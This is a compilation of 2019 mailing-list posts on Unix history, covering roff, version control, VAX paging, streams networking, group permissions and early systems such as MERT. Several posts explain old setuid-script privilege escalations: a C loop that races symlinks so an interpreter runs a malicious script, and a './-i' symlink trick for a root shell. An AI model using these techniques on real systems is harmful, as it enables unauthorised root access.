current less. (This external thing is actually a compile time
option.) So this is all i need, and it would be very nice to have
this possibility much more often.
Well. The mandoc project has an option to generate links for
manual pages on best guess, too. This works surprisingly well,
and does not need a patch for less as it generates the usual tag
files that you all know about. It cannot support exact anchors,
of course, and it does not have TOC generation either,
i think.
But anyway: it is possible.
|You need a way to position the cursor with more flexibility than more gives
|you.
--steffen
|
|Der Kragenbaer, The moon bear,
|der holt sich munter he cheerfully and one by one
|einen nach dem anderen runter wa.ks himself off
|(By Robert Gernhardt)
-- End forward <20190916191228.1YQHs%steffen(a)sdaoden.eu>
--steffen
|
|Der Kragenbaer, The moon bear,
|der holt sich munter he cheerfully and one by one
|einen nach dem anderen runter wa.ks himself off
|(By Robert Gernhardt)
> I'd love to see the docs on that early stuff and see if Joe Ossanna
> added in his own magic or was he carrying forward earlier magic.
Here are scans of non-unix roff in 1971: https://www.cs.dartmouth.edu/~doug/roff71/roff71
I also have 1969, but it's bedtime and that will have to wait.
Relative numbers (+n), roman numerals, .ti, top and bottom margin settings,
.po, running titles, tab settings, hyphenation and footnotes were not in
Saltzer's runoff. Most other features were.
Doug
I found the following in the archive:
To: cbunix23(a)yahoo.com
Cc: Warren(a)plan9.bell-labs.com, Toomey(a)plan9.bell-labs.com,
<wkt(a)tuhs.org>
Subject: Re: cb/unix tapes
From: Dennis Ritchie <dmr(a)plan9.bell-labs.com>
Date: Tue, 15 Jul 2003 21:23:37 -0400
They've arrived on my doorstep; thanks, Larry.
9-track drives seem thin on the ground, but we'll
see.
Dennis
Does anybody know what became of those tapes? I know it was 13 years ago,
but it's one of the few sightings of CB-Unix tapes I could find...
Warner
Well, if we're going to get into editor, erm, version-control wars,
I'll state my unpopular opinion that SCCS and RCS were no good at
all and CVS only pretended to be any good. Subversion was the first
system I could stand using.
The actual basis for that opinion (and it's just my opinion but it's
not pulled out of hyperspace) is that the older systems think only
about one file at a time, not collections of files. To me that's
useless for any but the most-trivial programming (and wasn't
non-trivial programming what spurred such systems?). When I am
working on a non-trivial program, there's almost always more than
one source file, and to keep things clean often means refactoring:
splitting one file into several, merging different files, removing
files that contain no-longer-useful junk, adding files that
implement new things, renaming files.
A revision-control system that thinks only about one file at a
time can't keep track of those changes. To me that makes it
worse than useless; not only can it not record a single
commit with a single message and version number when files
are split and combined, it requires extra work to keep all
those files under version control at all.
CVS makes an attempt to handle those things, but the effect
is clunky in practice compared to successors like svn.
One shouldn't underestimate the importance of a non-clunky
interface. In retrospect it seems stupid that we didn't have
some sort of revision control discipline in Research UNIX, but
given the clunkiness of SCCS and RCS and CVS, there's no way
most of us would have put up with it. Given that we often had
different people playing with the same program concurrently,
it would have taken at least CVS to meet our needs anyway.
Norman `recidivist' Wilson
Toronto ON
George Michaelson writes:
> What Larry and the other RCS haters forget is that back in the day,
> when we all had more hair, RCS was --->FAST<--- and SCCS was S.L.O.W.
>
> because running forward edits on a base state of 1000 edits is slow.
> Since the majority action is increment +1 on the head state the RCS
> model, whilst broken in many ways
> was FAST
>
> -G
And also that RCS had a much friendlier interface.
John Reiser did do his own paging system for UNIX/32V.
I heard about it from friends at Bell Labs ca. 1982-83,
when I was still running systems for physicists at Caltech.
It sounded very interesting, and I would love to have had
my hands on it--page cache unified with buffer cache,
copy-on-write from the start.
The trouble is that Reiser worked in a different group
from the original UNIX crowd, and his management didn't
think his time well spent on that work, so it never got
released.
I remember asking, either during my interview at the Labs
or after I started work there, why the 4.1 kernel had been
chosen instead of Reiser's. It had to do with maintainability:
there were already people who could come in and hack on the
Berkeley system, as well as more using it and maintaining it,
whereas Reiser's system had become a unicorn. Nobody in
1127 wanted to maintain a VM system or anything much close
to the VAX hardware. So the decision was to stick with a
kernel for which someone else would do those things.
Once I'd been there for a year or so and settled in, I found
that I was actually looking after all that stuff, because I
was really interested in it. (Which seemed to delight a lot
of people.) Would we have ended up using Reiser's kernel had
I been there a couple of years earlier? I don't know.
It is in any case a shame that jfr's code never saw the light
of day. I really hope someone can find it on an old tape
somewhere and we can get it into the archive, if only because
I'd love to look at it.
Norman Wilson
Toronto ON
> From: Steve Simon
> i went for a student placement there but didnt get it - i guess my long
> hair (then) didn't fit as the interview seemed good.
Maybe you seemed too honest! :-)
Noel
I don't remember from where I got the scheme, so it might be general,
DigitalUnix, or HP-UX related. Checking the "HP 9000 networking XTI
programmer's guide" from 1995 there's no diagram.
The application which was initially developed on a SystemV derived
UNIX the Computer division of Philips Electronics had bought, used
TLI. Taken over by DEC we moved to SCO UNIX still using TLI, moving to
XLI on Alpha/Digital Unix.
The nice thing of TLI/XLI is the poll(). A multi-client server can
check a list of file descriptors AND indicate a timeout value for the
poll(). Like in
ret_cd = poll(tep->CEPlist, tep->CEPnumb, timeout);
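In more generic terms (illustrative names only, not the application's code), the pattern looks like this:

#include <poll.h>
#include <stdio.h>

/* wait up to five seconds for traffic on any of the client descriptors */
int
wait_for_clients(struct pollfd *fds, int nfds)
{
    int i, n;

    n = poll(fds, nfds, 5000);          /* timeout is in milliseconds */
    if (n <= 0)
        return n;                       /* 0 = timeout, -1 = error */
    for (i = 0; i < nfds; i++)
        if (fds[i].revents & POLLIN)
            printf("fd %d is readable\n", fds[i].fd);
    return n;
}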
BTW putting in a bit of OSI, on SCO UNIX I use a DEC package which
offers a TLI interface to an OSI TP4/IP stack. Even worked using X.25
as WAN. OSI TP4 and NetBIOS originally bought from Retix.
>Date: Sat, 31 Aug 2019 11:41:40 -0400
>From: Clem Cole <clemc(a)ccc.com>
>To: Rudi Blom <rudi.j.blom(a)gmail.com>
>Cc: tuhs <tuhs(a)minnie.tuhs.org>
>Subject: Re: [TUHS] dmr streams & networking [was: Re: If not Linux,then what?]
>Message-ID:
> <CAC20D2MJPFoU6r73U9GDaqG+Q7vpH3T7CiDNjgN3D2uyuAJgLQ(a)mail.gmail.com>
>Content-Type: text/plain; charset="utf-8"
>
>It's the Mentat implementation that HP originally bought. At LCC we had
>to hack on it a bit when we put Transparent Network Computing (TNC) stuff
>in HP-UX [we had full process migration working BTW -- A real shame that
>never shipped].
>On Sat, Aug 31, 2019 at 5:44 AM Rudi Blom <rudi.j.blom(a)gmail.com> wrote:
>> Whenever I hear UNIX, networking and streams I have to think about this
>> scheme.
>>
>> Still using this, even on HP-UX 11.31 on Itanium rx-servers
>>
>> Cheers,
>> uncle rubl
On 8/28/19, Clem Cole <clemc(a)ccc.com> wrote:
> On Wed, Aug 28, 2019 at 2:46 AM Peter Jeremy <peter(a)rulingia.com> wrote:
>
> Tru64 talked to DECnet Phase X (I don't remember which one, maybe 4 or 5),
> which had become an ISO/OSI stack by that point for political reasons
> inside of Digital (the OSI vs TCP war reminded me of the Pascal vs C and
> VMS vs UNIX wars - all very silly in retrospect, but I guess it was really
> about who got which $s for development).
It was DECnet Phase V that was based on the ISO/OSI stack. IIRC, at
the time the European telcos were pushing OSI, it had become an ISO
standard, etc. etc. It was also pretty easy to compatibly slide the
legacy proprietary DECnet Phase IV adaptive routing and virtual
circuit layers into the OSI stack.
TCP won the war, of course. The risk with international standards
fashioned out of whole cloth by a committee (as opposed to being a
regularization of existing practice) is that the marketplace may
choose to ignore the "standard". OSI and the Ada programming language
are cases in point.
-Paul W.
https://linux.slashdot.org/story/19/08/26/0051234/celebrating-the-28th-anni…
Leaving licensing and copyright issues out of this mental exercise, what
would we have now if it wasn't for Linux? Not what you'd WANT it to be,
although that can add to the discussion, but what WOULD it be?
I'm not asking as a proponent of Linux. If anything, I was dragged
kicking and screaming into the current day and have begrudgingly ceded
my server space to Linux.
But if not for Linux, would it be BSD? A System V variant? Or (the
horror) Windows NT?
I do understand that this has been discussed on the list before. I
think, however, it would make a good late-summer exercise. Or late
winter depending on where you are :)
art k.
hi
the other early vm system not mentioned yet is the one Charles Forsyth wrote at the university of york for sunos. i never used it as i was learning v7 on an interdata 30 miles away at the time but i read his excellent paper on it.
-Steve
Whenever I hear UNIX, networking and streams I have to think about this scheme.
Still using this, even on HP-UX 11.31 on Itanium rx-servers
Cheers,
uncle rubl
Check out "Setting Up a Research UNIX System" by Norman Wilson. troff
sources are in v10.
====
But that assumes you're being given a root image to copy
to the disk initially, no? We never made a general-purpose
distribution tape; we just made one-off snapshots when someone
wanted a copy of the system in the 10/e era.
Is there a binary root image in Warren's archive? I forget.
Norman Wilson
Toronto ON
(where the weather feels like NJ these days, dammit)
wow, systime.
i went for a student placement there but didnt get it - i guess my long hair (then) didn't fit as the interview seemed good.
i had a mate who was working late on the day the combined uk police and CIA (it was said) arrived to shut them down, and tell them they ARE being taken over by CDC. the crime was selling systime re-badged vaxes to the ussr at the height of the cold war. seems odd now that they thought they could get away with it.
exciting times.
-Steve
> Doug McIlroy <doug(a)cs.dartmouth.edu> wrote:
>
>>
>>> How long was research running on a PDP-11 and when did they move to a VAX?
>>
>> London and Reiser had ported Unix to the VAX, replete with virtual memory, in 1978. By the time v7 was released (1979), Vaxen had become the workhorse machines in Research.
>>
>> Doug
>
> So, what's the story on why the London/Reiser port didn't get adapted
> back by Research, and they ended up starting from 4.1 BSD?
>
> Thanks,
>
> Arnold
Sorry, what I said about London/Reiser is true, but not the whole story. L/R didn't have demand paging; BSD did.
Doug
> How long was research running on a PDP-11 and when did they move to a VAX?
London and Reiser had ported Unix to the VAX, replete with virtual memory, in 1978. By the time v7 was released (1979), Vaxen had become the workhorse machines in Research.
Doug
Gentlefolk,
Does anyone have an original copy of the Lions text? All I have is the new
printed version and my nth generation photocopy from 1975. There is
another 50th event occurring in a few weeks that would love to be able to
borrow a copy for an artifact display. Reply to me off-list if you can
help.
Clem
On 8/28/19, Clem Cole <clemc(a)ccc.com> wrote:
>
> So, I think the MIPS product was a holding pattern while DEC got its
> strategy together. Alpha wouldn't really show up until later (I would leave
> LCC and go to DEC to be a part of that). Also note Alpha was brought
> up/debugged on Ultrix and of course, Prism sort of had Ultrix on it. But
> I think using the MIPS chip kept them in the game, when Vax was dying and
> RISC was the word on the street.
I was in DEC's compiler development team at the time, working on the
new GEM common back end, and this matches my recollection. The
original plan was for GEM to be the successor to the VAX Code
Generator (VCG, the common back end used by DEC's PL/I, Ada, C/C++ and
a few other compilers on VAX/VMS) and its first target was the VMS
personality module Prism's OS, Mica. Prism was close to delivering
silicon when it was cancelled in favor of Alpha. DEC's MIPS-based
products were done as a stopgap until Alpha was ready. The GEM group
implemented a MIPS code generator. I don't recall whether we actually
shipped any GEM-based products on the MIPS/Ultrix platform. GEM
focused on Alpha (on VMS, Unix, and Windows host and target platforms)
shortly thereafter.
-Paul W.
> I find it hard to believe what you remember Dennis saying. The point of
> dmr's streams was to support networking research in the lab and avoid the
> myriad bugs of the mpx interface by stepping around them completely.
>
> Perhaps it's out of context.
>
> -rob
> I could be wrong but that's my memory. What he told me was streams was
> for line disciplines for tty drivers. That's what I know but you were
> there, I was not. I'm pretty confused because what Dennis said to me
> was that he did not think streams would work for networking, he thought
> they made sense for a stream but not for a networking connection because
> that had multiple connections coming up through a stream.
There is some contemporary material that gives a bit of context. The quotes are a bit contradictory and perhaps reflect evolving views.
[1]
The original dmr paper (1984) on streams (http://cm.bell-labs.co/who/dmr/st.html) seems to support the no networking view, focussing on terminal handling in its discussion. Also, near the end it says: "Streams are linear connections; by themselves, they support no notion of multiplexing, fan-in or fan-out. [...] It seems likely that a general multiplexing mechanism could help in both cases, but again, I do not yet know how to design it.” This seems to exclude usage for networking, which is typically multiplexed.
[2]
However, now that the V8 sources are available it is clear that the streams mechanism was used (by dmr?) to implement TCP/IP networking. He explains how that tallies with the above quote on multiplexing in a 1985 usenet post: https://groups.google.com/forum/#!topicsearchin/net.unix-wizards/subject$3A…
The config files in the surviving TUHS V8 source tree actually match with the setup that dmr described in the penultimate paragraph.
If the post by dmr does not immediately appear, click on the 8-10-85 post by 'd...(a)dutoit.UUCP' to make it fold out. For ease of reference, I’m including the message text below.
<quote>
Steven J. Langdon claimed that without multiplexing one couldn't
do a proper kernel-resident version of TCP/IP in the V8 stream context.
Here's how it's done.
It is still true in our system that stream multiplexing does not occur,
in the sense that every stream connection has (from the point of view
of the formal data structures) exactly two ends, one at a user process,
and the other at a device or another process. However, this has, in
practice, not turned out to be a problem. Say you have a hardware
device that hands you packets with a channel (or socket) number buried
inside in some complicated format. The general scheme to handle the
situation uses both a line discipline (stream filter module) and
associated code that, to the system, looks like a stream device driver
with several minor devices; these have entries in /dev.
A watchdog process opens the underlying real device, and pushes
the stream module. Arriving packets from the real device
are passed to this module, where they are analyzed,
and then given to the appropriate associated pseudo-device.
Likewise, messages written on the pseudo-device are shunted over to
the line discipline, where they are encoded appropriately and sent
to the real device. This is where the multiplexing-demultiplexing
occurs; formally, it is outside of the stream structure, because
the data-passing doesn't follow the forward and backward links
of the stream modules. However, the interfaces of the combined
larger module obey stream rules.
For example, IP works this way: The IP line discipline looks at the
type field of data arriving from the device, and determines whether the
packet is TCP or UDP or ARP or whatever, and shunts it off to the
stream associated with /dev/ip6 or /dev/ip17 or whatever the numbers
are.
TCP, of course, is multiplexed as well. So there is a TCP line
discipline, and a bunch of TCP devices; a watchdog process opens
/dev/ip6, and pushes the TCP line discipline; then the TCP packets it
gets are parcelled out to the appropriate /dev/tcpXX device. Each TCP
device looks like the end of a stream, and may, of course, have other
modules (e.g. tty processor) inserted in this stream.
UDP sits on top of IP in the same way.
This example is complicated, because (TCP,UDP)/IP is. However, it
works well. In particular, the underlying real device can be either an
ethernet or our own Datakit network; the software doesn't care. For
example, from my machine, I can type "rlogin purdy" and connect to a
Sequent machine running 4.2; the TCP connection goes over Datakit to
machine "research" where it is gatewayed to a local ethernet that purdy
is connected to.
A further generalization (that we haven't made) is in principle easy:
there can be protocol suites other than IP on an Ethernet cable. So
there could be another layer to separate IP from XNS from Chaosnet, etc.
Dennis Ritchie
</quote>
Maybe the subtle notion expressed as "formally, it is outside of the stream structure, because the data-passing doesn't follow the forward and backward links of the stream modules. However, the interfaces of the combined larger module obey stream rules” explains how dmr could talk about streams as being just suitable for line disciplines without meaning to say that they did not have good use in networking.
Paul
John Steinhart:
Just curious - am doing a cross-country road trip with my kid and saw a
Wisconsin dev null license plate. Didn't get a look at the driver.
=====
It's in ken/mem.c in Fourth Edition, dmr/mem.c in Fifth and Sixth.
Norman (no sheds) Wilson
Toronto ON
Just curious - am doing a cross-country road trip with my kid and saw a
Wisconsin dev null license plate. Didn't get a look at the driver.
Does it belong to anyone on this list?
Jon
This is probably the place to ask:
I understand why the shell builtin "exec" is the same as the syscall exec()
in the sense of "replace this process with that one." But why is it also
the way to redirect filehandles in the current shell? (That is, why isn't
the redirection named something else?)
Adam
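A rough sketch of the mechanism behind the question (illustrative code, not any particular shell's source): the shell applies redirections with open()/dup2() just before the exec system call, and "exec 3< file" with no command name is that same sequence minus the final execv(), so the open descriptor stays with the current shell.

#include <fcntl.h>
#include <unistd.h>

/* roughly what a shell child does for "cmd < file" */
void
redirect_then_exec(const char *path, char *const argv[])
{
    int fd = open(path, O_RDONLY);

    if (fd >= 0) {
        dup2(fd, 0);        /* make the file the new standard input */
        close(fd);
    }
    execv(argv[0], argv);   /* leave this out and only the redirection remains */
}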
On Fri, Aug 02, 2019 at 06:49:19PM -0400, Jim Carpenter wrote:
> On 8/2/19 4:14 PM, Warren Toomey wrote:
> > Hi all, I'm chasing the Youtube video of the PDP-7 at Bell Labs where
> > people are using it to draw circuit schematics.
>
> A Bell Labs video? The only Bell Labs video I remember seeing that had
> someone doing circuit schematics had it being done on a PDP-5. The -7 was
> shown later doing music stuff. (That's the -7 that I thought maybe Unix
> started life on.)
Thanks Jim, Is it this one?
https://www.youtube.com/watch?v=iwVu2BWLZqA
They mention a Graphics-1 device, so maybe I'm getting this confused
with the PDP-7 and the Graphics-2.
Cheers, Warren
Oops. Didn't think it through: the problem is argv[1],
passed as the name of the script being executed, not
argv[0]. Disregard my previous execl(...).
A related problem is the inherent race condition:
If you do
ln -s /bin/setuidscript .
./setuidscript
./setuidscript is opened twice: once when the kernel
reads it and finds #! as magic number and execs the
interpreter, a second time when the interpreter opens
./setuidscript. If you meanwhile run something that
swoops in in the background and replaces ./setuidscript
with malicious instructions for the interpreter, you
win.
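A sketch of the swooping-in process (hypothetical file names; the attacker only has to win the window between the two opens):

#include <stdio.h>
#include <unistd.h>

int
main(void)
{
    /* flip ./setuidscript back and forth between the real target and a
       malicious script; if the kernel's #! open sees the real one and the
       interpreter's open sees the other, the interpreter runs the
       attacker's commands with the script owner's privileges */
    for (;;) {
        unlink("link");
        symlink("/bin/setuidscript", "link");
        rename("link", "setuidscript");   /* window 1: kernel reads #! here */

        unlink("link");
        symlink("evil.sh", "link");
        rename("link", "setuidscript");   /* window 2: interpreter opens this */
    }
}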
I remember managing to do this myself at one point in
the latter part of the 1980s. That was when I fell
out of love with setuid interpreter scripts.
It looks like we didn't disable the danger in the
Research kernel, though. I don't remember why not.
Norman Wilson
Toronto ON
> Date: Fri, 2 Aug 2019 09:28:18 -0400
> From: Clem Cole <clemc(a)ccc.com>
> To: Aharon Robbins <arnold(a)skeeve.com>, Doug McIlroy <doug(a)cs.dartmouth.edu>
> Cc: The Eunuchs Hysterical Society <tuhs(a)tuhs.org>
> Subject: Re: [TUHS] Additional groups and additional directory permissions
>
> The best I can tell/remember is that groups went through 4 phases:
> 1.) No groups (earliest UNIX) [ I personally never used this except in the
> V0 retrocomputing]
> 2.) First group implementation (Thompson) [My first UNIX introduction was
> with this implementation]
> 3.) PWB 1.0 (Mashey version) [then saw this post PWB]
> 4.) BSD 4.2 (wnj version) [and lived this transition]
>
> Each was a little different in semantics.
>
> As Doug mentioned, many sites (like Research) really did not need much and
> groups were really not used that widely. Thompson added something like
> the Project number of TOPS and some earlier systems. Truth is, it did not
> help much IMO. It was useful for grouping things like the binaries and
> keeping some more privileged programs from having to be setuid root.
>
> Mashey added features in PWB, primarily because of the RJE/Front end to the
> Mainframes and the need to have better protections/collections of certain
> items. But they still were much more like the DEC PPN, were you were
> running as a single group (i.e. the tuple UID/GID). This lasted a pretty
> long time, as it worked reasonably well for larger academic systems, where
> you had a user and were assigned a group, say for a course or class you
> might be taking. If you looked at big 4.1 BSD Vaxen like at Purdue/Penn
> State, *etc.*, that's how they were admin'd. But as Doug said, if you were
> still a small site, the use of groups was still pretty shallow.
>
> But, as part of the CSRG support for DARPA, there was a push from the
> community to have a list of groups that a user could be a part and you
> carried that list around in a more general manner. The big sites, in
> particular, were pushing for this because they were using groups as a major
> feature. wnj implemented same and it would go out widely in 4.2, although
> >>by memory<< that was in 4.1B or 4.1C first. It's possible Robert Elz
> may have brought that to Bill with his quota changes, but frankly I've
> forgotten. There was a lot of work being done to the FS at that point,
> much less Kirk's rewrite.
>
> But as UNIX went back to workstations, the need for a more general group
> system dropped away until the advent widely used distributed file systems
> like CMU's AFS and Sun's NFS. Then the concept of a user being in more
> than one group became much more de rigueur even on a small machine.
>
> Clem
Late to answer...
As far as I remember, Clem's description is correct. The filesystem
itself stores only one owner and one group ID. When checking access
to the file, the file owner is checked to see if the user ID matches.
If so, then the owner permissions are applied. If not then the group
array associated with the user is used to decide if the group of the
file matches one of the groups of which the user is a member and if
so the group permissions apply. Otherwise the other permissions are
used.
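In outline (illustrative code only, not the kernel's), that check is:

#include <sys/types.h>

/* apply owner bits if the uid matches, else group bits if any entry in the
   user's group array matches the file's group, else the other bits */
int
has_access(uid_t fuid, gid_t fgid, mode_t mode,
           uid_t uid, const gid_t *groups, int ngroups, int want)
{
    int i;

    if (uid == fuid)
        return ((mode >> 6) & want) == want;        /* owner rwx bits */
    for (i = 0; i < ngroups; i++)
        if (groups[i] == fgid)
            return ((mode >> 3) & want) == want;    /* group rwx bits */
    return (mode & want) == want;                   /* other rwx bits */
}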
In BSD, the group assigned to the file is assigned from the group of
the directory in which it is created. The setgid flag can be set only
if that group is a member of the user's group array. The user can only
change the group ID to one that appears in their group array.
Until multiple group sets were added to System V, the group of the
file was taken from the gid assigned to the user at login.
Kirk McKusick
Do, or did, anything other than Linux use a concept of an initramfs /
initrd to create a pre-(main)-init initialization environment to prepare
the system to execute the (main)-init process?
--
Grant. . . .
unix || die
Greetings,
I was wondering if there were any early versions of MERT available?
Reading different sources, it appears that MERT was a real time kernel that
used EMT traps to implement unix system calls (from around V4 or V5 given
the timelines) on top of a real time executive (though some sources seem to
imply it was a derivative of V4, most disagree).
I see this in our archives
https://wiki.tuhs.org/doku.php?id=misc:snippets:mert1 which is quite handy
for discovering its (and other early) unix lineages for a talk I'm doing in
about a month. Now that we have sources, I go back and double check the
recollections of things like this to see if version numbers were right,
etc. But I can't do that with MERT at all. I can find the Bell Systems
Technical Journal for Unix that has a brief article on it, but no sources
to double check.
So I thought I'd ask here if we have any MERT artifacts I can look at that
have escaped my casual browsing of the archive. So far I've just found an
email from Kevin Bowling on the topic from last month with no replies. And
a similar thread from 2002, plus pleading from time to time (I can't tell
if Warren or Noel wants it more :).
I guess the same could be said for CB-UNIX and UNIX/TS, though I see a
USDL/CB_Unix directory in the archive I could look at :).
Warner
On Tue, 6 Aug 2019, Lyndon Nerenberg wrote:
>> Just to extend this thread a bit more, when did the set[ug]id bit start
>> getting turned off if the file was overwritten?
>
> I'm pretty sure that's been the case since the dawn of time.
Hmmm... I have this vague memory of V5 (which I only used for a couple of
months before we got V6) not clearing that bit, but after all these years
my memory is starting to fail me :-(
> It was certainly the case in every System V (release 0 and beyond) I
> worked with, along with many BSD derivatives (SunOS 3+, Ultrix, etc).
> (And Xenix, which had its own insanity that I now think selinux is
> trying to inflict on me.)
I've always thought that Xenix was insane to start with... Then again, my
first experience with it was on a 286... Now, when porting Unify, should
I use large memory model here or small memory model? Crazy.
> This has been documented in chown(2) for as long as I can remember, so
> that's a good place to start if you want to dig back through the various
> source trees.
I don't have access to the sources right now, but I'll take your word for
it; it was just a passing thought.
-- Dave
Hello everyone,
My name is Benito Buchheim and I am a computer science student at
Hasso-Plattner-Institute in Germany.
During our Operating Systems Course we came across The Unix Heritage
Society, more specifically Research Unix Version 3, and took a look into
the source code of this version.
The idea arose to try to get this running somehow as a sort of voluntary
task.
So I started digging my way through the available material and quickly
found the "modified_nsys" version by Warren Toomey, which conveniently
contained a very detailed readme file on how to compile and run this
version on a Unix v5 emulator.
Thus, I started cloning the simh Github Repository and built the pdp11
emulator.
After downloading the v5root disk image and figuring out how to use simh
to run it, I had a working Unix v5, but struggled a bit to copy more
than one file onto it using the emulated devices.
In the end, I used a very hacky way and wrote a short python script
which just runs the emulator and "copy pastes" the folder structure into
the image. I then thought I was ready to start working my way through
Toomey's readme.
Unfortunately already the first command failed quite miserably. I
changed my working directory and ran the first shell script to compile
the kernel, but cc spat out loads of error messages which are not very
detailed. As this is a very early version of C code I am kinda stuck at
this point and running a bit out of ideas on what may have gone wrong.
As there is this mailing list, we thought we would have a chat with the
experts. Maybe there is somebody who could help or give a hint on how to
get this running on the pdp11 emulator.
I attached my shell script output and the v5 image containing the v3
source code in the /sys/nsys directory.
It can be downloaded here:
https://www.mission-eins.de/runningv3.zip
Thanks a lot and best wishes from a small suburb near Berlin,
Benito Buchheim
> From: Dave Horsfall
> it actually *unlinked* directories
Maybe the application was written by a LISP programmer? :-)
(Not really, of course; it was probably just someone who didn't know much
about Unix. They had a list of system calls, and 'unlink' probably said 'only
works on directories when the caller is root', so...)
Speaking of LISP and GC, it's impressive how GC is not really a big issue any
more. At one point people were even building special CPUs that had hardware
support for GC; now it seems to be a 'solved problem' on ordinary CPUs.
Noel
https://www.youtube.com/watch?v=g3jOJfrOknA
National Inventors Hall of Fame - NIHF
Published on Feb 18, 2019
Bell Labs colleagues Ken Thompson and Dennis Ritchie developed UNIX,
a multi-tasking, multi-user operating system alternative to the batch
processing systems then dominating the computer industry.
Not sure why I hadn't seen this before :)
Cheers, Warren
> From: Alec Muffett
>>> ln -s /bin/scriptname ./-i
>>> "-i" # assuming that "." is already in your path
'scriptname' (above) would have to be a shell script which was SETUID root?
That was part of what I was missing, along with the below.
> The cited filename is passed as argv[1]
I wonder why it passed the link name, instead of the actual filename of the
target (script)? Perhaps to allow one script to have multiple functions,
depending on the name it was called with? But that could have been done with
hard links? (Adding a hard link must require write access, because the link
count in the inode has to be updated? So it would be equally secure as not
having an SUID program with write access.)
Part of the problem is having the kernel involved in starting shell scripts;
convenient in some ways, but V6 etc worked fine without that 'feature'.
Noel
Noel Chiappa:
I wonder why it passed the link name, instead of the actual filename of the
target (script)? Perhaps to allow one script to have multiple functions,
depending on the name it was called with?
====
In fact the latter is still used here and there in standard
system distributions.
But from a security viewpoint it doesn't matter. For
ln -s /bin/scriptname ./-i
substitute
execl("/bin/scriptname", "-i", (char *)0);
If you can execute a program, you can fake its arguments,
including argv[0]. There is no defence.
Norman Wilson
Toronto ON
> From: Alec Muffett
> until someone realised that you could do:
> ln -s /bin/scriptname ./-i
> "-i" # assuming that "." is already in your path
> ...and get a root shell.
I'm clearly not very awake this morning, because I don't understand how this
works. Can you break it down a little? Thanks!
Noel
Is it just me, or did someone actually implement set-uid scripts? I've
proposed some silly things over the decades (my favourite is stty()
working on things other than terminals, and guess what, we got ioctl()
etc) but I have a vague recollection of this...
The trouble is, I've worked with dozens of Unix-based vendors over the
years (some good, some not so much) and so I've lost track of all the
stupidity that I've seen.
ObAnecdote: Just about every Unix vendor went belly-up shortly after I
left them (under various circumstances), because the waste-of-space middle
managers simply did not appreciate the importance of having a Unix guru
on board if you're in the game of selling Unix boxen.
I'd happily name them, but I think the principals are still alive :-)
-- Dave
Read and write permission were common ideas--even part of
the Atlas paging hardware that was described before 1960.
The original concept of time-sharing was to give a virtual
computer to each user. When it became clear that sharing
was an equally important aspect, owner/other permissions
arose. I believe that was the case with Multics.
Owner/other permissions were in PDP-11 Unix from the start.
Group permissions arose from the ferment of daily talk in
the Unix lab. How might the usual protections be extended
to collaborative projects? Ken and Dennis deserve credit
for the final implementation. Yet clean as the idea of groups
was, it has been used only sporadically (in my experience).
Execute permission (much overloaded in Unix) also dates
back to the dawn of paging. One Unix innovation, due to
Dennis, was the suid bit--the only patented feature in
the Research system. It was instantly adopted for
maintaining the Moo (a game now sold under the name
"Master Mind") league standings table.
One trouble with full-blown ACLs, as required by NSA's
Orange Book, is obscurity. It is hard (possibly NP-
complete) to analyze the actual security of an ACL
configuration.
A common failing of Unix administration was a proliferation
of suid-root programs, e.g. mail(1). I recall one system
that had a hundred such programs. Sudo provided a way
station between suid and ACLs.
Doug
> From: Arthur Krewat
> there's the setuid bit on directories - otherwise known as the sticky
> bit.
Minor nit; in V6 at least (not sure about later), the 'sticky' bit was a
separate bit from SUID and SGID. (When set on a pure/split object file, it
told the OS to retain the text image on the swap device even when no active
process was using it. Hence the name...)
Noel
Hi all, I'm chasing the Youtube video of the PDP-7 at Bell Labs where
people are using it to draw circuit schematics. This seems to show
the Graphics-2 module that, I believe, was built at the Labs. Can
someone e-mail the URL? I've done some grepping but I haven't found it yet.
Thanks, Warren
Hello Unix enthusiasts.
I'd like to know the person or the group of people behind implementing this
filesystem permission system.
We have been using this system for nearly 40 years and it addresses all the
aspects of the permission matter without any hassle.
I'm inspired to know who came up with this design, and how.
Also, if it derived from somewhere else or if there's an origin story about
this, it would be worth sharing.
Cheers.
Stephan
--
No When
I was talking about DMERT today and Larry McVoy was wondering if it slipped
out in any fashion.
I believe there were official trainers as well as a production emulator
that ran it on Solaris/SPARC. I have never seen them anywhere. Old phone
phreaks I’m acquainted with had illicit access. Does anyone know if source
or the trainer or emulator are tangible?
I enjoyed the BTSJ on DMERT as much as the Unix articles. Highly recommend
reading.
Regards,
Kevin
Does anyone know where the 386 port of PCC came from?
While trying to build a Tahoe userland for the i386, it seems that everything was built with GCC…
Was there a PCC for the i386 around ’88-90? It seems after the rapid demise of the Tahoe/Harris
HCX-9 that the non-Vax/HCX-9 platforms had moved to GCC?
Also, does anyone know any good test software for LIBC? I've been tracing through some
strange issues rebuilding LIBC from Tahoe, where I had to include some bits from
Reno to get diropen to actually work. I would imagine there ought to have been some
platform exercise code to make sure things were actually working instead of say
building as much as you can, and playing rogue for a few hours to make sure
it's stable enough.
> BSD[Ii] got in trouble with AT&T for their sales number, which was
> 1-800-ITS-UNIX. I don't know if they ever got officially sued or not.
There was a joke that MIT should have sued them too, for violating their
trademark on ITS.
-- Richard
--
The University of Edinburgh is a charitable body, registered in
Scotland, with registration number SC005336.
> Does anyone have documentation or history for European efforts in the Unix-like operating systems? For example there was Bull’s Chorus, which I seem to recall was based on Mach or a competing microkernel (it was a very long time ago and I used it for no more than about two hours..).
> I am rather saddened by the fact that there is so much about all the Unix (and not only Unix) history of computing in the USA and so very little in Europe. I wouldn’t even know where to start, to be honest; all I have as a history is the Italian side from my father and his other mad friends and colleagues in Milan. So little of it is recorded, never mind written down.
In the '80s I worked at Philips Data Systems in Apeldoorn, the
Netherlands. Not in Development, but in System Support. Philips was
working on a System V.3 based UNIX running on Motorola 68000 CPUs in a
P9X00 server. Called MPX as in Multi-Processor UNIX. The Multi part
refers to having an Ethernet, X25 and SDLC board running a tailored
version of the OS to offload the main CPU.
See for example
https://www.cbronline.com/news/better_late_philips_enters_the_uk_unix_marke…https://www.cbronline.com/news/philips_ready_with_68030_models_for_its_p900…
Later Philips moved to i386 with a UNIX based on an 'unknown version'.
The division was bought by DEC (some say sold off by Philips) in 1991 and
we moved to DEC's choice of SCO UNIX. The 'intelligent' comm boards
were ported and still ran their separate OS, though.
Unfortunately I never had any of that OS type of source and my paper
archive was left behind. Only have some small higher level test stuff
and my mail archive. For a while I was "rudi blom"
<blom(a)kiwi.idca.tds.philips.nl>, later rudi blom"@apd.mts
Nearly all the unixes I used were from the US, but one stands out.
I spent a week or two trying to get my head around Helios, which was aimed at parallel systems (transputers). I believe it was French in origin, and was unix-like at the command line, but the shell supported mesh pipelines and other unique ideas.
